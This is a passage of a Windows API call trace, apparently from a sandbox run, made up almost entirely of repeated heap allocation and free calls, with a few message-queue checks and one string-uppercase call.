dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0181.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0181.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0181.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0181.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0181.370] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0181.370] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0181.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0181.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0181.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0181.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0181.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0181.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0181.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0181.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0181.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0181.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0181.373] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0181.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0181.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0181.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0181.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0181.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0181.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 